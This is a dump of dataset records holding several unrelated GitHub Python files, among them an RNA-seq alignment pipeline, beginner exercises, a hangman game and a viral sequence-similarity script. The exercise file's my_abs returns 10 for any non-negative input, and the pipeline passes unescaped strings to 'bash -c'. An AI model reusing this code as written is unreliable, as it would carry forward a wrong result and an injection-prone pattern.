name='crackthenut'),\n]","repo_name":"AnonMuk/casesquirrels","sub_path":"casesquirrels/squirrelsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9018244415","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\n\nclass guiaecoworld(models.Model):\n _name = 'guiaeco.clientes'\n _inherits = {'res.partner': 'partner_id'}\n\n partner_id = fields.Many2one('res.partner', domain=[('is_company', '=', True)], required=True, ondelete=\"restrict\")\n activo = fields.Boolean(string=\"Activado en Guía?\")\n especialidad = fields.Char(string=\"Especialidad\")\n mapaG = fields.Char(string=\"Mapa Google\")\n mapaEmbed = fields.Char(string=\"Mapa Embed\", help=\"Añadir solo codigo embed, despues de 'pb='\")\n imagenPlaca = fields.Binary(string=\"Foto con Placa\")\n cabecera = fields.Binary(string=\"Imagen de cabecera\")\n fechaIncorporacion = fields.Date(string=\"Fecha Incorporación a Guía\", required=True)\n","repo_name":"juanjocop/CustomModulosOdoo","sub_path":"guiaecoworld/models/guia_ecoworld.py","file_name":"guia_ecoworld.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12375205713","text":"import os\nfrom external_cmd import TimedExternalCmd\nfrom defaults import *\nfrom utils import *\n\nFORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'\nlogFormatter = logging.Formatter(FORMAT)\nlogger = logging.getLogger(__name__)\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logFormatter)\nlogger.addHandler(consoleHandler)\n\n\ndef run_hisat2(align_idx=None,\n seq_1=\"\", seq_2=\"\", seq_u=\"\",\n seq_sra=\"\", ref_gtf=\"\", \n hisat2_opts=\"\", hisat2=HISAT2, hisat2_sps=HISAT2_SPS,\n samtools=SAMTOOLS,\n start=0, sample= \"\", nthreads=1,\n workdir=None, outdir=None, timeout=TIMEOUT):\n\n logger.info(\"Running alignment (HISAT2) for %s\"%sample)\n if not os.path.exists(align_idx+\".1.ht2\"):\n logger.error(\"Aborting!\")\n raise Exception(\"No HISAT index file %s.1.ht2\"%align_idx)\n \n if seq_1 and seq_2:\n for s1 in seq_1.split(\",\"):\n if not 
os.path.exists(s1):\n logger.error(\"Aborting!\")\n raise Exception(\"No Mate 1 sequence file %s\"%s1)\n for s2 in seq_2.split(\",\"):\n if not os.path.exists(s2):\n logger.error(\"Aborting!\")\n raise Exception(\"No Mate 2 sequence file %s\"%s2)\n seq_argument=\"-1 %s -2 %s\"%(seq_1,seq_2)\n elif seq_u:\n seq_argument=\"-U %s\"%(seq_u)\n for su in seq_u.split(\",\"):\n if not os.path.exists(su):\n logger.error(\"Aborting!\")\n raise Exception(\"No unpaired sequence file %s\"%su)\n\n elif seq_sra:\n seq_argument=\"--sra-acc %s\"%(seq_sra)\n for sr in seq_sra.split(\",\"):\n if not os.path.exists(sr):\n logger.error(\"Aborting!\")\n raise Exception(\"No sra sequence file %s\"%sr)\n\n\n work_hisat2=os.path.join(workdir,\"hisat2\",sample)\n create_dirs([work_hisat2])\n \n step=0\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n msg = \"Erase HISAT2 work directory for %s\"%sample\n command=\"rm -rf %s/*\" % (\n work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=False)\n retcode = cmd.run(msg=msg,timeout=timeout)\n step+=1\n\n hisat2_log = os.path.join(work_hisat2, \"hisat2.log\")\n hisat2_log_fd = open(hisat2_log, \"w\")\n \n ksps = \"\"\n msg = \"Prepare known-splicesites for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n if ref_gtf:\n if not os.path.exists(ref_gtf):\n logger.error(\"Aborting!\")\n raise Exception(\"No reference GTF file %s\"%ref_gtf)\n else:\n ksps = ref_gtf.strip() + \"known-splicesite.txt\"\n if os.path.exists(ksps):\n logger.info(\"Will use the precomputed %s as --known-splicesite-infile for HISAT2\"%ksps)\n else:\n msg=\"compute --known-splicesite-infile for HISAT2\"\n ksps = os.path.join(work_hisat2, \"known-splicesite.txt\")\n ksps_fd = open(ksps, \"w\")\n \n command=\"%s %s\" % (hisat2_sps,ref_gtf)\n command=\"bash -c \\\"%s\\\"\"%command\n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=ksps_fd, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n \n\n \n if \"--dta \" not in hisat2_opts:\n hisat2_opts += \" --dta\"\n if \"--rg-id \" not in hisat2_opts:\n hisat2_opts += \" --rg-id hisat2\"\n if \"--rg \" not in hisat2_opts:\n hisat2_opts += \" --rg SM:%s\"%sample\n if \"--threads \" not in hisat2_opts:\n hisat2_opts += \" --threads %d\"%nthreads \n if ksps:\n hisat2_opts += \" --known-splicesite-infile %s\"%ksps\n\n msg = \"HISAT2 for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"%s %s -x %s %s -S %s/alignments.sam --novel-splicesite-outfile %s/splicesites.tab\" % (\n hisat2, hisat2_opts, align_idx, seq_argument,work_hisat2, work_hisat2 )\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n msg = \"converting SAM to BAM for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"%s view -Su %s/alignments.sam -@ %d -o %s/alignments.bam\" % (\n samtools, work_hisat2, nthreads, work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = 
cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n    else:\n        logger.info(\"Skipping step %d: %s\"%(step,msg))\n    step+=1\n\n    msg = \"sorting BAM for %s\"%sample\n    if start<=step:\n        logger.info(\"--------------------------STEP %s--------------------------\"%step)\n        command=\"%s sort -@ %d -T %s/alignments.sorted -o %s/alignments.sorted.bam %s/alignments.bam \" % (\n            samtools, nthreads, work_hisat2, work_hisat2, work_hisat2)\n        command=\"bash -c \\\"%s\\\"\"%command \n        cmd = TimedExternalCmd(command, logger, raise_exception=True)\n        retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n    else:\n        logger.info(\"Skipping step %d: %s\"%(step,msg))\n    step+=1\n    \n\n\n    msg = \"Converting junctions to BED for %s\"%sample\n    if start<=step:\n        logger.info(\"--------------------------STEP %s--------------------------\"%step)\n        command=\"hisat2_jun2bed.py %s/splicesites.tab %s/splicesites.bed \" % (\n            work_hisat2, work_hisat2)\n        command=\"bash -c \\\"%s\\\"\"%command \n        cmd = TimedExternalCmd(command, logger, raise_exception=True)\n        retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n    else:\n        logger.info(\"Skipping step %d: %s\"%(step,msg))\n    step+=1\n\n    msg = \"Clean temp alignment files for %s\"%sample\n    if start<=step:\n        logger.info(\"--------------------------STEP %s--------------------------\"%step)\n        command=\"rm %s/alignments.sam %s/alignments.bam\" % (work_hisat2, work_hisat2)\n        command=\"bash -c \\\"%s\\\"\"%command \n        cmd = TimedExternalCmd(command, logger, raise_exception=True)\n        retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n    else:\n        logger.info(\"Skipping step %d: %s\"%(step,msg))\n    step+=1\n\n\n    out_hisat2=os.path.join(outdir,\"hisat2\",sample)\n    create_dirs([out_hisat2])\n    msg=\"Copy predictions to output directory for %s.\"%sample\n    if start<=step:\n        logger.info(\"--------------------------STEP %s--------------------------\"%step)\n        if os.path.exists(\"%s/alignments.sorted.bam\"%work_hisat2) and \\\n           os.path.exists(\"%s/splicesites.tab\"%work_hisat2) and \\\n           os.path.exists(\"%s/splicesites.bed\"%work_hisat2):\n            command = \"cp %s/alignments.sorted.bam %s/alignments.sorted.bam\"%(\n                work_hisat2, out_hisat2)\n            cmd = TimedExternalCmd(command, logger, raise_exception=True)\n            retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n            command = \"cp %s/splicesites.tab %s/splicesites.tab\"%(\n                work_hisat2, out_hisat2)\n            cmd = TimedExternalCmd(command, logger, raise_exception=True)\n            retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n            command = \"cp %s/splicesites.bed %s/splicesites.bed\"%(\n                work_hisat2, out_hisat2)\n            cmd = TimedExternalCmd(command, logger, raise_exception=True)\n            retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n    else:\n        logger.info(\"Skipping step %d: %s\"%(step,msg))\n    step+=1\n\n\n\n    alignments_bam = \"\"\n    junctions_tab = \"\"\n    junctions_bed = \"\"\n    if os.path.exists(\"%s/alignments.sorted.bam\"%out_hisat2):\n        logger.info(\"HISAT2 was successful!\")\n        logger.info(\"Output alignment: %s/alignments.sorted.bam\"%out_hisat2)\n        logger.info(\"Output junction tab: %s/splicesites.tab\"%out_hisat2)\n        logger.info(\"Output junction bed: %s/splicesites.bed\"%out_hisat2)\n        alignments_bam = \"%s/alignments.sorted.bam\"%out_hisat2 \n        junctions_tab = \"%s/splicesites.tab\"%out_hisat2 \n        junctions_bed = 
\"%s/splicesites.bed\"%out_hisat2 \n else: \n logger.info(\"HISAT2 failed!\")\n return alignments_bam,junctions_tab,junctions_bed\n\ndef run_sr_align(sr_aligner=\"HISAT2\", align_idx=None,\n seq_1=\"\", seq_2=\"\", seq_u=\"\",\n seq_sra=\"\", ref_gtf=\"\", \n hisat2_opts=\"\", hisat2=HISAT2, hisat2_sps=HISAT2_SPS,\n samtools=SAMTOOLS,\n start=0, sample= \"\", nthreads=1, \n workdir=None, outdir=None, timeout=TIMEOUT,ignore_exceptions=False):\n alignments_bam = \"\"\n junctions_tab = \"\"\n junctions_bed = \"\"\n if sr_aligner.upper()==\"HISAT2\":\n try :\n alignments_bam, junctions_tab, junctions_bed=run_hisat2(align_idx=align_idx,\n seq_1=seq_1, seq_2=seq_2, seq_u=seq_u,\n seq_sra=seq_sra, ref_gtf=ref_gtf, \n hisat2_opts=hisat2_opts, hisat2=hisat2, hisat2_sps=hisat2_sps,\n samtools=samtools,\n start=start, sample= sample, nthreads=nthreads,\n workdir=workdir, outdir=outdir, timeout=timeout)\n except Exception as excp:\n logger.info(\"HISAT2 failed!\")\n logger.error(excp)\n if not ignore_exceptions:\n raise Exception(excp)\n \n return alignments_bam, junctions_tab, junctions_bed","repo_name":"bioinform/rnacocktail","sub_path":"src/run_sr_align.py","file_name":"run_sr_align.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"31"} +{"seq_id":"5520294936","text":"#!/usr/bin/env python3\n\nimport math\n\ndef move(x, y, step, angle=0):\n\tnx = x + step * math.cos(angle)\n\tny = y - step * math.sin(angle)\n\treturn nx, ny\n\n\ndef quadratic(a, b, c):\n\td = b * b - 4 * a * c\n\tif d < 0:\n\t\traise TypeError('b*b-4ac<0')\n\tx1 = (-b + math.sqrt(d)) / (2 * a)\n\tx2 = (-b - math.sqrt(d)) / (2 * a)\n\treturn x1, x2\n\n\ndef my_abs(x):\n\tif not isinstance(x, (int, float)):\n\t\traise TypeError('bad operand type')\n\tif x >= 0:\n\t\treturn 10\n\telse:\n\t\treturn -x\n\n\ndef power(x, n=2):\n\ts = 1\n\twhile n > 0:\n\t\tn = n - 1\n\t\ts = s * x\n\treturn s\n\t\n\ndef calc(*numbers):\n\tsum = 0\n\tfor n in numbers:\n\t\tsum = sum + n * n\n\treturn sum\n\ndef product(a, *args):\n\tfor x in args:\n\t\ta = a * x\n\treturn a\n\t\ndef person(name, age, **kw):\n\tprint('name:', name, 'age:', age, 'other:', kw)\n\ndef f1(a, b, c=0, *args, **kw):\n\tprint('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\ndef f2(a, b, c=0, *, d, **kw):\n\tprint('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\ndef trim(s):\n\tb = 0\n\te = len(s)\n\twhile b < e and s[b] == ' ':\n\t\tb = b + 1\n\twhile b < e and s[e-1] == ' ':\n\t\te = e - 1\n\ts = s[b:e]\n\treturn s\n\n\ndef findMinAndMax(L):\n\tif len(L) == 0:\n\t\treturn (None, None)\n\tMin = L[0]\n\tMax = L[0]\n\tfor x in L[1:]:\n\t\tif x < Min:\n\t\t\tMin = x\n\t\tif x > Max:\n\t\t\tMax = x\n\treturn (Min, Max)\n\n\n","repo_name":"Doraemonfan/mytest","sub_path":"python/zlimbo.py","file_name":"zlimbo.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16067607477","text":"import sys\nimport random\nimport globals\n\n# Reads words from the 'words.txt' file and filters them then returns them as a list\ndef getWords(difficulty):\n \n # Initializing a list to store words obtained from the words.txt file\n rawWords = []\n\n # Initializing a list to store the filtered words based on the difficulty level\n filteredWords = []\n\n # Opens the words.txt file in read mode\n with open('../words.txt', 'r') as wfile:\n \n # Iterates through each line and stores each word in the rawWords 
list\n for line in wfile:\n rawWords = line.lower().split(', ')\n\n # Iterates through each word in the rawWords list and checks if the word falls in the easy or hard word category\n for word in rawWords:\n if (difficulty.lower() == 'easy' and len(word) <= globals.EASY_WORD_MAXLENGTH) or (difficulty.lower() == 'hard' and len(word) <= globals.HARD_WORD_MAXLENGTH and len(word) > globals.EASY_WORD_MAXLENGTH):\n \n # Stores the filtered word in the filteredWords list \n filteredWords.append(word)\n \n return filteredWords\n\n# Generates a random word from the filteredWords list\ndef getRandomWord(difficulty):\n return getWords(difficulty)[random.randint(0, len(getWords(difficulty)) - 1)]\n\n# Replaces each '_' in blanks with the guessed letter\ndef fillBlanks(letter, word, blanks):\n iterable = 0\n\n # Loops through each letter of the word \n while iterable < len(word):\n\n # Checks if the letter is equal to its consequent letter in the word\n if word[iterable] == letter:\n\n # Replaces the '_' in the blanks list with that letter\n blanks[iterable] = letter\n\n # Increments the index iterable\n iterable += 1\n\n # Prints each element of the blanks list separated by a single whitespace for better visualization\n print('\\n' + ' '.join(blanks))\n\n# Displays the starting menu \ndef displayMenu():\n\n print('WELCOME TO HANGMAN IN PYTHON!\\n')\n print(\"Type 'play' to start\")\n print(\"Type 'quit' to exit\\n\")\n\n# Call this in main.py to play the game\ndef play(difficulty):\n\n # This loop stops executing if the user does not wish to play anymore\n while True:\n\n # Starts the game by displaying the menu on the console\n displayMenu()\n\n # Taking user input\n choice = input('Enter your choice: ')\n\n # Dealing with corner cases\n while choice.lower() != 'play' and choice.lower() != 'quit':\n choice = input('Please enter a valid input: ')\n\n # If the user enters 'play' then we enter the logic of the game\n if choice.lower() == 'play':\n\n # Checks if user has entered the difficulty level as a command-line argument\n if len(sys.argv) < 2:\n\n # Prompting the user to enter the difficulty level\n difficulty = input('Please choose the difficulty level (easy/hard): ')\n \n else:\n # Initializing difficulty level as the second command-line argument\n difficulty = sys.argv[1]\n\n # Dealing with corner cases\n while difficulty.isalpha() == False or difficulty.lower() != 'easy' and difficulty.lower() != 'hard':\n difficulty = input('Please enter a valid difficulty level: ')\n\n # Generating the word\n word = getRandomWord(difficulty)\n\n # Storing word length\n word_length = len(word)\n\n # Initializing a character data type that stores the guessed letter\n letter = ''\n\n # Initializing the blanks list with the same number of '_' characters as the length of the word\n blanks = ['_']*word_length\n\n # Initializing misses counter\n misses = 0\n\n # Initializing guesses counter\n guesses = 0\n \n # This list stores each character that the user guesses correctly\n guessed_letters = []\n\n # This iterable is used as an index tracker for the guessed_letters list\n iterable = 0\n\n # For testing purposes\n # Remove the comment below to see the word before guessing\n print('\\nThe word is:', word)\n\n # The loop stops if misses exceed the maximum allowed count or if the user guesses all the letters correctly\n while misses < globals.ALLOWED_MISS_COUNT and guesses != word_length:\n\n # Taking input from the user\n letter = input('\\nPlease enter your guess: ')\n\n # Dealing with corner cases\n while 
letter.isalpha() == False or letter == '' or len(letter) > 1:\n letter = input('Please enter a valid value: ')\n\n # Printing '_' for each non-guessed letter and replacing each '_' with the right letter after each guess\n fillBlanks(letter=letter, word=word, blanks=blanks)\n\n # Checks if the letter is present in the word\n if letter not in word:\n misses += 1\n print(f'\\nYour guess is wrong!\\nGuesses = {guesses}\\nMisses = {misses}') \n \n # Prints Hangman art\n print(globals.HANGMANPICS[iterable])\n iterable += 1\n\n # Checks if the letter has already been guessed before\n elif letter in word and letter in guessed_letters:\n print(f'\\nYou have already guessed this letter!\\nGuesses = {guesses}\\nMisses = {misses}')\n \n else:\n # This loop checks to see if multiple letters inside the word match our guessed letter and increments the number of guesses accordingly\n for i in word:\n if letter == i:\n guesses += 1\n \n # Adds the guessed letter to our guessed_letters array \n guessed_letters.append(letter) \n \n print(f'\\nYour guess is right!\\nGuesses = {guesses}\\nMisses = {misses}') \n\n # Win/Lose prompts\n if misses == globals.ALLOWED_MISS_COUNT:\n print('\\nYou have lost the game :(. Better luck next time!')\n else:\n print('\\nYou have won the game :). Good Work!')\n\n # Asks the user if they wish to play again\n choice = input('\\nDo you want to play again? (Y/n) ')\n if choice.lower() == 'y':\n print()\n pass\n else:\n break\n\n # If the user enters 'quit' the above loop is skipped\n if choice == 'quit':\n break","repo_name":"abdullahkhalid00/cli-hangman","sub_path":"src/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11098795411","text":"\"\"\"Timer class\"\"\"\nimport threading\nfrom datetime import datetime\n\n\nclass Timer:\n \"\"\"Provide a timer\"\"\"\n def __init__(self):\n self.time_start = None\n self.timeout = None\n self.timer_thread = None\n\n def start(self, timeout, on_timeout_callback):\n \"\"\"start timer with timeout in seconds, on timeout call on_timeout_callback\"\"\"\n self.stop()\n self.time_start = datetime.now().timestamp()\n self.timeout = timeout\n self.timer_thread = threading.Timer(self.timeout, on_timeout_callback)\n self.timer_thread.start()\n\n def stop(self):\n \"\"\"stop timer\"\"\"\n if self.timer_thread is None:\n return\n self.timer_thread.cancel()\n self.time_start = None\n self.timeout = None\n\n def get_remaining_time(self) -> int:\n \"\"\"return the remaining time before timeout\"\"\"\n if self.timeout is None or self.time_start is None:\n return -1\n return int(self.timeout - (datetime.now().timestamp() - self.time_start))\n","repo_name":"kevin-briand/heatger","sub_path":"src/shared/timer/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6369334165","text":"import logging\nimport os\nimport re\nimport sys\n\nimport click\nfrom Bio import SeqIO\nfrom tqdm import tqdm\n\ntqdm.pandas()\nimport pandas as pd\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nsys.path.append(\"..\")\nfrom utils.data_clustering.sequence_clustering_utils import SequenceClusteringUtils\nfrom utils.data_cleaning.sequence_outliers_cleaner import SequenceOutliersCleaner\n\n\ndef clean_sequence_data_from_outliers(record: pd.Series, input_path: str, output_path: str):\n \"\"\"\n :param 
record: pandas row representative of a cluster of species sequences\n    :param input_path: path to the aligned sequences that include outliers\n    :param output_path: path at which to create the aligned sequences without the outliers\n    (without re-aligning - just removing outliers and then cleaning the induced alignment from only gap positions)\n    :return:\n    \"\"\"\n    if pd.notna(record.relevant_genome_accessions):\n        selected_accessions = record.relevant_genome_accessions.split(\";;\")\n        input_sequences = list(SeqIO.parse(input_path, format=\"fasta\"))\n        relevant_sequences = [seq for seq in input_sequences if seq.id in selected_accessions]\n        # filter out all gap positions with trimal\n        SeqIO.write(relevant_sequences, output_path, format=\"fasta\")\n        cmd = f\"trimal -in {output_path} -out {output_path} -noallgaps\"\n        res = os.system(cmd)\n        if res != 0:\n            logger.error(f\"trimal execution on {output_path} failed and so only-gap positions are apparent in the data\")\n\n\ndef compute_sequence_similarities_across_species(\n    species_info: pd.DataFrame, seq_data_dir: str, output_path: str, use_sequence_directly: bool = True,\n):\n    \"\"\"\n    :param species_info: data with the names of viruses corresponding to each viral species and the number of available sequences\n    :param seq_data_dir: directory holding fasta files of collected sequences per species to compute similarity based on\n    :param output_path: path to write the output dataframe to\n    :param use_sequence_directly: indicator of whether outliers should be removed based on the sequence data directly or based on their pairwise distances\n    :return:\n    \"\"\"\n    relevant_species_info = species_info.loc[\n        species_info.virus_species_name.isin(species_info.virus_species_name.unique())\n    ]\n    if relevant_species_info.shape[0] > 0 and relevant_species_info[\"#sequences\"].values[0] > 0:\n        logger.info(f\"computing sequence similarities across {len(species_info.virus_species_name)} species\")\n\n        intermediate_output_path = output_path.replace(\".\", \"_intermediate.\")\n        if os.path.exists(intermediate_output_path) and relevant_species_info[\"#sequences\"].values[0] > 2:\n            relevant_species_info = pd.read_csv(intermediate_output_path)\n        else:\n            if relevant_species_info.shape[0] > 0:\n                logger.info(\n                    f\"computing sequence similarity value for species {','.join(relevant_species_info.virus_species_name.unique())}\"\n                )\n                relevant_species_info = compute_entries_sequence_similarities(\n                    df=relevant_species_info,\n                    seq_data_dir=seq_data_dir,\n                    output_path=output_path.replace(\".\", \"_intermediate.\"),\n                )\n        if (\n            \"relevant_genome_accessions\" not in relevant_species_info.columns\n            or \"#relevant_sequences\" not in relevant_species_info.columns\n        ) or (relevant_species_info.loc[relevant_species_info.relevant_genome_accessions.isna()].shape[0] > 0):\n            logger.info(f\"computing outlier sequences for species {relevant_species_info.virus_species_name.unique()}\")\n            relevant_species_info = remove_outliers(\n                df=relevant_species_info,\n                similarities_data_dir=seq_data_dir,\n                output_path=output_path.replace(\".\", \"_intermediate.\"),\n                use_sequence_directly=use_sequence_directly,\n            )\n\n        # create new alignments without the outliers\n        new_seq_data_dir = f\"{seq_data_dir}/no_outliers/\"\n        os.makedirs(new_seq_data_dir, exist_ok=True)\n\n        relevant_species_info.loc[relevant_species_info[\"#sequences\"] > 1].apply(\n            lambda record: clean_sequence_data_from_outliers(\n                record=record,\n                input_path=f\"{seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', record.virus_species_name)}_aligned.fasta\",\n                
output_path=f\"{new_seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', record.virus_species_name)}_aligned.fasta\",\n            ),\n            axis=1,\n        )\n        sequence_similarity_fields = [\n            \"#sequences\",\n            \"mean_sequence_similarity\",\n            \"min_sequence_similarity\",\n            \"max_sequence_similarity\",\n            \"med_sequence_similarity\",\n            \"relevant_genome_accessions\",\n            \"#relevant_sequences\",\n        ]\n        relevant_species_info[\"#relevant_sequences\"] = relevant_species_info[\"relevant_genome_accessions\"].apply(\n            lambda x: x.count(\";;\") + 1 if pd.notna(x) else np.nan\n        )\n        species_info.set_index(\"virus_species_name\", inplace=True)\n        for field in sequence_similarity_fields:\n            species_info[field] = np.nan\n            species_info[field].fillna(\n                value=relevant_species_info.set_index(\"virus_species_name\")[field].to_dict(), inplace=True,\n            )\n\n        species_info.reset_index(inplace=True)\n    else:\n        species_info[\"#sequences\"] = 0\n        species_info[\"#relevant_sequences\"] = 0\n\n    species_info.to_csv(output_path, index=False)\n    logger.info(f\"wrote associations data clustered by virus species to {output_path}\")\n\n\ndef compute_entries_sequence_similarities(df: pd.DataFrame, seq_data_dir: str, output_path: str,) -> pd.DataFrame:\n    \"\"\"\n    :param df: dataframe with association entries\n    :param seq_data_dir: directory with fasta file corresponding to each species with its corresponding collected sequences\n    :param output_path: path to write the intermediate result to\n    :return:\n    \"\"\"\n    pid = os.getpid()\n    tqdm.pandas(desc=\"worker #{}\".format(pid), position=pid)\n\n    new_df = df\n    new_df[\n        [\"mean_sequence_similarity\", \"min_sequence_similarity\", \"max_sequence_similarity\", \"med_sequence_similarity\",]\n    ] = np.nan\n    if new_df.shape[0] > 0:\n        logger.info(\n            f\"computing sequence similarities for #species {len(new_df.virus_species_name.values)} that consists of {new_df['#sequences'].values} sequences respectively\"\n        )\n\n        func = SequenceClusteringUtils.get_sequence_similarity_with_multiple_alignment\n        new_df[\n            [\n                \"mean_sequence_similarity\",\n                \"min_sequence_similarity\",\n                \"max_sequence_similarity\",\n                \"med_sequence_similarity\",\n            ]\n        ] = new_df.progress_apply(\n            lambda x: [1, 1, 1, 1]\n            if x[\"#sequences\"] == 1\n            else func(sequence_data_path=f\"{seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', x.virus_species_name)}.fasta\",),\n            axis=1,\n            result_type=\"expand\",\n        )\n\n        new_df.to_csv(output_path, index=False)\n    return new_df\n\n\ndef remove_outliers(\n    df: pd.DataFrame, similarities_data_dir: str, output_path: str, use_sequence_directly: bool = False,\n) -> pd.DataFrame:\n    \"\"\"\n    :param df: dataframe with association entries\n    :param similarities_data_dir: directory with similarity dataframes corresponding to each species with its corresponding collected sequences\n    :param output_path: path to write the intermediate result to\n    :param use_sequence_directly: indicator of whether outlier detection should use the sequence data directly or use the pairwise distances between sequences as features\n    :return:\n    \"\"\"\n    pid = os.getpid()\n    tqdm.pandas(desc=\"worker #{}\".format(pid), position=pid)\n\n    if not os.path.exists(output_path) or (\n        os.path.exists(output_path) and \"relevant_genome_accessions\" not in pd.read_csv(output_path).columns\n    ):\n        new_df = df\n        new_df[\"relevant_genome_accessions\"] = np.nan\n        if new_df.shape[0] > 0:\n            logger.info(\n                f\"computing sequence outliers for species {list(new_df.virus_species_name.unique())[0]} that consists of {','.join(list([str(i) for i in new_df['#sequences'].values]))} sequences 
respectively\"\n            )\n\n            func = (\n                SequenceOutliersCleaner.get_relevant_accessions_using_sequence_data_directly\n                if use_sequence_directly\n                else SequenceOutliersCleaner.get_relevant_accessions_using_pairwise_distances\n            )\n            input_path_suffix = \"_aligned.fasta\" if use_sequence_directly else \"_similarity_values.csv\"\n            new_df.loc[new_df[\"#sequences\"] > 1, \"relevant_genome_accessions\"] = new_df.loc[\n                new_df[\"#sequences\"] > 1, \"virus_species_name\"\n            ].progress_apply(\n                lambda x: func(\n                    data_path=f\"{similarities_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', x)}{input_path_suffix}\"\n                )\n            )\n            new_df[\"#relevant_sequences\"] = new_df[\"relevant_genome_accessions\"].apply(\n                lambda x: x.count(\";;\") + 1 if pd.notna(x) else np.nan\n            )\n\n            new_df.to_csv(output_path, index=False)\n    else:\n        new_df = pd.read_csv(output_path)\n    return new_df\n\n\n@click.command()\n@click.option(\n    \"--species_info_path\",\n    type=click.Path(exists=True, file_okay=True, readable=True),\n    help=\"path to dataframe holding the names of taxa under each viral species\",\n)\n@click.option(\n    \"--sequence_data_dir\",\n    type=click.Path(exists=False, file_okay=True, readable=True),\n    help=\"directory holding sequence data files per species with their collected sequences\",\n)\n@click.option(\n    \"--log_path\",\n    type=click.Path(exists=False, file_okay=True, readable=True),\n    help=\"path holding the logging of the script\",\n)\n@click.option(\n    \"--df_output_path\",\n    type=click.Path(exists=False, file_okay=True, readable=True),\n    help=\"path holding the output dataframe to write\",\n)\n@click.option(\n    \"--use_sequence_directly\",\n    type=click.BOOL,\n    help=\"indicator of whether outliers should be removed based on sequence data directly or based on pairwise distances\",\n    required=False,\n    default=False,\n)\ndef compute_seq_similarities(\n    species_info_path: click.Path,\n    sequence_data_dir: click.Path,\n    log_path: click.Path,\n    df_output_path: click.Path,\n    use_sequence_directly: bool,\n):\n    # initialize the logger\n    logging.basicConfig(\n        level=logging.INFO,\n        format=\"%(asctime)s module: %(module)s function: %(funcName)s line: %(lineno)d %(message)s\",\n        handlers=[logging.StreamHandler(sys.stdout), logging.FileHandler(str(log_path)),],\n        force=True, # run over root logger settings to enable simultaneous writing to both stdout and file handler\n    )\n\n    # process input data\n    species_info = pd.read_csv(species_info_path)\n\n    # compute sequence similarities\n    compute_sequence_similarities_across_species(\n        species_info=species_info,\n        seq_data_dir=str(sequence_data_dir),\n        output_path=str(df_output_path),\n        use_sequence_directly=use_sequence_directly,\n    )\n\n\nif __name__ == \"__main__\":\n    compute_seq_similarities()\n","repo_name":"halabikeren/vir_to_host","sub_path":"virus/compute_sequence_similarity_across_species.py","file_name":"compute_sequence_similarity_across_species.py","file_ext":"py","file_size_in_byte":11399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22103900144","text":"import xml.etree.ElementTree as et\nfrom yahoo.yahoo_api import YahooApi \nfrom utilities import utilities\n\ndef FantasyHockeyApi(format, credentials, league_id):\n    if format.lower() == 'json':\n        return JsonFantasyHockeyApi(credentials, league_id)\n    elif format.lower() == 'xml':\n        return XmlFantasyHockeyApi(credentials, league_id)\n    else:\n        raise NotImplementedError()\n\nclass JsonFantasyHockeyApi(YahooApi):\n    def __init__(self, credentials, league_id, game_id=None):\n        
